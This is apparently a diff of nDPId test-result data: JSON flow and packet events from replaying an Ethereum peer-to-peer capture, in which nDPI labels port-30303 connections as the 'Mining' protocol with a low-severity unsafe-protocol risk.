+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1578508365021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365021,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGuz\/AqAG4sj4K2t1Cdl8xVnl5AAAAALAC\/\/8AHAAAAgQFtAEDAwUBAQgKItiWHgAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365029,"flow_last_seen":1578508365029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365029,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1578508365029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqGLAqAG4sj4dt91Ddl+W2yuDAAAAALAC\/\/\/VpgAAAgQFtAEDAwUBAQgKItiWJgAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365038,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHKIQAAEAR+iHAqAG4QipS9nZfdl8As8h52l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1578508365154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365154,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4TfAqAG4iskMV91Ldl\/HR3E5AAAAALAC\/\/+X6AAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365169,"flow_last_seen":1578508365169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365169,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 